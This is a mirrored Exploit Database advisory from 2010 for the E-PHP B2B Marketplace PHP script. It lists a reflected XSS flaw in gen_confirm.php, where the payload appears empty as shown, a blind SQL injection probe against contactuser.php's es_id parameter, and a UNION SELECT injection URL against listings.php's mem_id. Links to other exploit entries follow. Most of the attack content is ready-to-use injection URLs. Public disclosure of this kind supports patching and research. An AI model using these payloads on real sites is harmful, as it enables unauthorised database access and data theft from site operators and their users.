E-PHP B2B Marketplace – Multiple Vulnerabilities

Exploit Database
47 阅读

作者： MizoZ

日期： 2010-06-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/13819/

/*

Name : E-PHP B2B Marketplace Multiple Vulns
WebSite : http://www.ephpscripts.com/b2b-trading-portal.php
Price : 150 USD

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com


*/

# XSS

- gen_confirm.php shows the error message of $_GET['errmsg'] , but it's not
protected against XSS

- Exploit : [HOST]/[PATH]/gen_confirm.php?errmsg=

# Blind SQLi

- contactuser.php suffers from a blind sqli in the get "es_id"

- Exploit : [HOST]/[PATH]/contactuser.php?es_type=3&es_id=62+and+1=(select
1)--

# SQLi

- listings.php suffers from a blind sqli in the get "mem_id"

- Exploit :
[HOST]/[PATH]/listings.php?mem_id=-207+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

last Exploits
E-PHP B2B Marketplace – Multiple Vulnerabilities的更多信息

Zimbra – ‘view’ Cross-Site Scripting：
MyClassifiedScript 5.1 – SQL Injection：
eduTrac – ‘showmask’ Directory Traversal：
ASUS DSL-X11 ADSL Router – DNS Change：
Backdrop CMS 1.23.0 – Stored XSS：
Integria IMS 5.0.83 – Cross-Site Request Forgery：
Softbiz Resource Repository Script – Blind SQL Injection：
WordPress Plugin Website FAQ 1.0 – SQL Injection：